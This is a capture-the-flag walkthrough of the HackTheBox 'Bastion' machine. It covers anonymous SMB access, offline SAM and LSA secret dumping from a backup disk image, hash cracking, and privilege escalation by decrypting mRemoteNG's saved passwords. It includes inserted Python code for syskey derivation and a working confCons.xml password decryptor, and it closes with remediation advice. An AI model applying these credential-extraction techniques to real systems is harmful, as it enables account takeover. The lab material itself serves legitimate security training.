HackTheBox : Bastion
Summary
To solve this box, we first enumerated the open ports on the target machine with nmap. SMB was open, so we enumerated the shares and found that the Backups share was accessible anonymously. From it we mounted a virtual disk image that allowed us to retrieve the NT hashes of the users' passwords and get an initial foothold. After that, we took advantage of a program installed on the target system to escalate our privileges.
Reconnaissance
Nmap
Based on the output, we can see that the SMB port (tcp/445) is open and accepts guest authentication. So let's check which shares a guest can access: anonymous share access is the kind of low-hanging fruit worth looking at first.
SMB
Let’s first list the shares and their respective permissions using smbmap :
FYI, the -q flag excludes the shares on which we have no access.
As you can see, we have read and write permissions on the Backups share. Let's list its contents recursively:
Among the files listed above, one stands out: note.txt, whose permissions differ from the rest. Let's download it and take a look at its content:
Interesting! The sysadmins warn against transferring the entire backup locally because it would take too long. Rather than downloading it, let's mount the Backups share on our system with mount.cifs, the command used to mount a CIFS/SMB filesystem over the network:
-o user=,passwd= passes the mount options; here we give an empty username and password, i.e. a guest session. Since we also have write access to this share, adding ro to the options is a cheap way to make sure we don't modify the backup by accident.
Once done, let's browse the mounted filesystem to see if we can find any valuable information:
Great! We found two virtual hard disks.
A virtual hard disk (VHD) is a disk image file format that stores the entire contents of a computer's hard drive, replicating an existing drive including all of its data and structural elements (source: TechTarget).
Let's mount them from our attacker machine. To do that, we first need to install libguestfs-tools (apt install libguestfs-tools). Once done, let's mount the biggest .vhd file with guestmount, a command used to mount a guest filesystem on the host. If guestmount complains that it cannot start its appliance, exporting LIBGUESTFS_BACKEND=direct before running it avoids the libvirt dependency:
Here is a quick explanation of guestmount's flags:
-a: add a virtual disk image (the .vhd file)
-i: inspect the virtual disk for an operating system, then mount its filesystems
-r: mount the virtual disk read-only
After successfully mounting the virtual disk, we can examine the files it contains as the root user.
Note: we can browse the files of the mounted disk because the virtual hard disk is not encrypted (no full-disk encryption such as BitLocker is in use).
Initial Access
In this section, we do an initial recon of the mounted disk. On Windows, local account password hashes are stored in the SAM (Security Account Manager) registry hive, while the SECURITY hive holds the LSA secrets (service account passwords, the autologon DefaultPassword, cached domain credentials).
SAM hashes and LSA secrets can be dumped live, locally or remotely, from the running registry, or offline from the hive files themselves, which is our case here.
Notes:
1/ The SAM hive is encrypted with a key called the syskey (also known as the boot key). The syskey is not stored in the SAM itself; it is derived from four values held in the SYSTEM hive. That's why we need both the SAM and SYSTEM files to successfully dump the hashes.
2/ The SAM, SECURITY and SYSTEM files are locked while the system is running, but that's not an issue here since we are reading them from a mounted disk image.
These files can be retrieved from the C:\Windows\System32\config folder:
Great! Let's now dump the hashes using samdump2, which is installed by default on Kali. It takes the SYSTEM and SAM files as input, derives the syskey from the SYSTEM hive and uses it to decrypt the hashes stored in the SAM database:
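To make note 1 above concrete, here is an added example (my own code, not part of the original writeup and not taken from samdump2 or impacket) of the two key-derivation steps these tools perform before any hash can be decrypted: rebuilding the syskey from the four Lsa class names stored in the SYSTEM hive, and deriving the per-account DES keys from the user's RID. The class names are UTF-16LE strings of 8 hex characters in the hive; the function below takes them already decoded. The byte permutation is the one used by creddump and impacket. The class-name values and the RID are constructed inputs, not read from the Bastion VHD, and the final cipher step (RC4 or AES on the SAM's F value, then DES on the stored hash) is left to the tools because it needs a crypto library.

```python
# Added example: how the syskey and the per-user DES keys are derived (stdlib only).
# The class-name values used at the bottom are constructed, not from the Bastion VHD.

# Registry keys whose *class names* hold the scrambled syskey, read in this order:
# HKLM\SYSTEM\CurrentControlSet\Control\Lsa\{JD, Skew1, GBG, Data}
BOOTKEY_PIECES = ("JD", "Skew1", "GBG", "Data")

# Fixed permutation applied to the 16 joined bytes (same table as creddump / impacket)
BOOTKEY_PERMUTATION = (0x8, 0x5, 0x4, 0x2, 0xB, 0x9, 0xD, 0x3,
                       0x0, 0x6, 0x1, 0xC, 0xE, 0xA, 0xF, 0x7)


def bootkey_from_class_names(class_names: dict) -> bytes:
    """Rebuild the 16-byte syskey from the four 8-hex-char class-name strings."""
    scrambled = b"".join(bytes.fromhex(class_names[name]) for name in BOOTKEY_PIECES)
    if len(scrambled) != 16:
        raise ValueError("each class name must decode to exactly 4 bytes")
    return bytes(scrambled[i] for i in BOOTKEY_PERMUTATION)


def _str_to_des_key(seven: bytes) -> bytes:
    """Expand 7 bytes into an 8-byte DES key: 7 bits per byte, odd-parity LSB.
    DES ignores the parity bit, so tools that skip this step get the same result."""
    k = [
        seven[0] >> 1,
        ((seven[0] & 0x01) << 6) | (seven[1] >> 2),
        ((seven[1] & 0x03) << 5) | (seven[2] >> 3),
        ((seven[2] & 0x07) << 4) | (seven[3] >> 4),
        ((seven[3] & 0x0F) << 3) | (seven[4] >> 5),
        ((seven[4] & 0x1F) << 2) | (seven[5] >> 6),
        ((seven[5] & 0x3F) << 1) | (seven[6] >> 7),
        seven[6] & 0x7F,
    ]
    out = bytearray()
    for b in k:
        b <<= 1
        if bin(b).count("1") % 2 == 0:   # make the byte's parity odd
            b |= 1
        out.append(b)
    return bytes(out)


def rid_to_des_keys(rid: int) -> tuple:
    """Derive the two DES keys that decrypt an account's 16-byte encrypted NT hash
    (one key per 8-byte half). Each key comes from the little-endian RID repeated to 7 bytes."""
    r = rid.to_bytes(4, "little")
    s1 = r + r[:3]                      # b0 b1 b2 b3 b0 b1 b2
    s2 = r[3:] + r[:3] + r[3:] + r[:2]  # b3 b0 b1 b2 b3 b0 b1
    return _str_to_des_key(s1), _str_to_des_key(s2)


if __name__ == "__main__":
    # Constructed class names; a real hive holds values such as these as UTF-16LE hex strings
    sample = {"JD": "00010203", "Skew1": "04050607", "GBG": "08090a0b", "Data": "0c0d0e0f"}
    print("syskey:", bootkey_from_class_names(sample).hex())
    k1, k2 = rid_to_des_keys(500)   # 500 is the RID of the built-in Administrator account
    print("DES keys for RID 500:", k1.hex(), k2.hex())
```

The syskey is then mixed with the SAM's F value to unwrap the "hashed boot key", which decrypts each account's hash blob; the result is still DES-encrypted with the two RID-derived keys above, which is why the RID shows up in every dump line.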
We could also use impacket's secretsdump (secretsdump.py -sam SAM -system SYSTEM LOCAL):
Let's also dump the LSA secrets, this time from the SECURITY and SYSTEM hives (secretsdump.py -security SECURITY -system SYSTEM LOCAL):
As you can see, we found a juicy piece of information: a DefaultPassword secret. This is the password Windows keeps for automatic logon, so it belongs to whichever account is configured to autologon. Although we don't know which user that is yet, we can try it against the different users of the target system.
So we now have two pieces of information at our disposal: the NT hashes and the default password.
Since the WinRM port (tcp/5985) is open, let's try to get an initial foothold by performing a pass-the-hash attack against the user L4mpje, using evil-winrm with L4mpje's NT hash:
Unfortunately, it didn't work. Bear in mind that a valid credential alone is not enough for WinRM: the account must also belong to the Administrators or Remote Management Users group. I tried again, this time with the default password rather than the hash:
Note: You might think of PsExec, but it won't work either, since we have no access to the ADMIN$ share.
After these failed login attempts, I tried to crack L4mpje's NT hash using this resource:
Awesome! We obtained the plaintext password of the user L4mpje, and it is identical to the default password we got from the LSA dump.
Let's try to get an initial foothold, this time over SSH:
Fantastic! We have initial access to the target machine. Let's retrieve the user flag from the Desktop folder:
Great! We now need to escalate our privileges in order to get full control over the machine.
Privilege Escalation
While enumerating the programs installed on the compromised machine, one in particular caught my eye:
After some research: mRemoteNG (Multi-Remote Next Generation Connection Manager) is a remote connection manager for Windows. It supports several protocols (RDP, SSH, VNC, rlogin, telnet, etc.) and saves each connection's details, such as the IP address, username and password, in an XML configuration file, confCons.xml, located at C:\Users\%user%\AppData\Roaming\mRemoteNG.
The issue with storing this information in the configuration file is that the passwords, although encrypted, can easily be decrypted with publicly available tools: unless the user has set a master password, the encryption key is derived from a hard-coded default one, so anyone who can read the file can recover the cleartext. Personally, I use this script:
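What makes the decryption possible is not weak cryptography but a predictable key: when no master password has been set, mRemoteNG (1.75 and later, the AES-GCM format that the public decryptor scripts handle) derives the AES-256 key with PBKDF2-HMAC-SHA1 from the default password mR3m and a salt that is stored in the blob itself, so anyone holding confCons.xml can rebuild the key. The following is an added example (my own code, not the script the writeup uses and not mRemoteNG's) that decrypts the Password attributes of a confCons.xml. It needs the cryptography package (pip install cryptography). Because the real file's values are not reproduced here, the sample XML is generated inside the block with a matching encrypt function; the connection names, usernames and secrets in it are constructed.

```python
import base64
import hashlib
import os
import xml.etree.ElementTree as ET

from cryptography.hazmat.primitives.ciphers.aead import AESGCM  # pip install cryptography

# Master password mRemoteNG falls back to when the user has never set one
DEFAULT_MASTER_PASSWORD = "mR3m"
SALT_LEN = NONCE_LEN = TAG_LEN = 16


def derive_key(master_password: str, salt: bytes, iterations: int) -> bytes:
    """PBKDF2-HMAC-SHA1 -> 32-byte AES-256 key; iterations come from the KdfIterations attribute."""
    return hashlib.pbkdf2_hmac("sha1", master_password.encode("utf-8"), salt, iterations, dklen=32)


def mremoteng_decrypt(blob_b64: str, master_password: str = DEFAULT_MASTER_PASSWORD,
                      iterations: int = 1000) -> str:
    """Decrypt one base64 Password value laid out as salt || nonce || ciphertext || GCM tag.
    The salt doubles as the associated data. A wrong key raises cryptography's InvalidTag."""
    blob = base64.b64decode(blob_b64)
    salt = blob[:SALT_LEN]
    nonce = blob[SALT_LEN:SALT_LEN + NONCE_LEN]
    ciphertext_and_tag = blob[SALT_LEN + NONCE_LEN:]      # cryptography expects the tag appended
    key = derive_key(master_password, salt, iterations)
    return AESGCM(key).decrypt(nonce, ciphertext_and_tag, salt).decode("utf-8")


def mremoteng_encrypt(plaintext: str, master_password: str = DEFAULT_MASTER_PASSWORD,
                      iterations: int = 1000) -> str:
    """Inverse of mremoteng_decrypt; used here only to build a sample file offline."""
    salt, nonce = os.urandom(SALT_LEN), os.urandom(NONCE_LEN)
    key = derive_key(master_password, salt, iterations)
    sealed = AESGCM(key).encrypt(nonce, plaintext.encode("utf-8"), salt)
    return base64.b64encode(salt + nonce + sealed).decode("ascii")


def decrypt_confcons(xml_text: str, master_password: str = DEFAULT_MASTER_PASSWORD) -> dict:
    """Return {connection name: (username, cleartext password)} for every Node carrying a Password."""
    root = ET.fromstring(xml_text)
    iterations = int(root.attrib.get("KdfIterations", "1000"))
    found = {}
    for node in root.iter():
        if node.attrib.get("Password"):
            found[node.attrib.get("Name")] = (
                node.attrib.get("Username"),
                mremoteng_decrypt(node.attrib["Password"], master_password, iterations),
            )
    return found


def protected_by_custom_master_password(xml_text: str) -> bool:
    """True when the default master password does NOT open the file (a real one was set)."""
    try:
        decrypt_confcons(xml_text)
        return False
    except Exception:   # cryptography.exceptions.InvalidTag
        return True


# Constructed sample connections (names, usernames and secrets are made up)
SAMPLE_CONNECTIONS = {"DC01": ("Administrator", "Hunter2!"), "jump-ssh": ("ops", "correct horse")}


def build_sample_confcons(master_password: str = DEFAULT_MASTER_PASSWORD) -> str:
    """Build a minimal confCons.xml-shaped document around SAMPLE_CONNECTIONS."""
    nodes = "".join(
        f'  <Node Name="{name}" Type="Connection" Username="{user}" '
        f'Password="{mremoteng_encrypt(pw, master_password)}" />\n'
        for name, (user, pw) in SAMPLE_CONNECTIONS.items()
    )
    return ('<mrng:Connections xmlns:mrng="http://mremoteng.org" ConfVersion="2.6" '
            'EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000">\n'
            f"{nodes}</mrng:Connections>\n")


if __name__ == "__main__":
    for name, (user, pw) in decrypt_confcons(build_sample_confcons()).items():
        print(f"{name}: {user} / {pw}")
```

On a real confCons.xml the same call, fed the file's text, does the job of the script the writeup links to; if it raises InvalidTag, the user set a master password and you are back to guessing it.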
Wonderful! We decrypted the Administrator user's password.
Note: the installed mRemoteNG is also an outdated version, as you can see in the image below:
The latest version as I am writing this writeup is v1.76.20.
Well, before connecting as Administrator, let's first check that the account is active (for example with net user administrator):
Knowing that the Administrator account is active, let's connect to it over SSH with the decrypted password:
Excellent! Now that we have full control over the target system, we can retrieve the root flag from the Desktop folder:
Remediations
Here are some recommendations to fix the weaknesses we exploited:
1/ Unauthorized Access
To gain initial access, we mounted a virtual disk image from the Backups SMB share, which is fully accessible (read and write) to anyone without any restriction. We then dumped L4mpje's password hash from the backed-up SAM and cracked it with an online service, which let us log into his account. Fixing this starts with requiring strong authentication before any share can be accessed, and with not granting write access to a backup share at all. Furthermore, virtual disk images and backups should be encrypted, since they contain sensitive data such as password hashes; a strong, unique password for L4mpje would also have kept the hash from being cracked.
2/ Encryption Failure
To escalate our privileges, we took advantage of the way mRemoteNG stores connection credentials in its configuration file: the passwords are encrypted, but with a key derived from a default master password that is public, so we decrypted them with a Python script downloaded from GitHub. To fix this, install the latest version of the software (here) and, above all, set a custom master password in mRemoteNG so the stored credentials can no longer be decrypted with the default key; better still, do not save a privileged account's password in a connection manager at all.
Wrapping Up
That’s it guys. Congrats on having made it so far 👏.
I hope you enjoyed the writeup.
If so, do not forget to click on the little clap icon below and subscribe to my newsletter to keep up with my latest articles.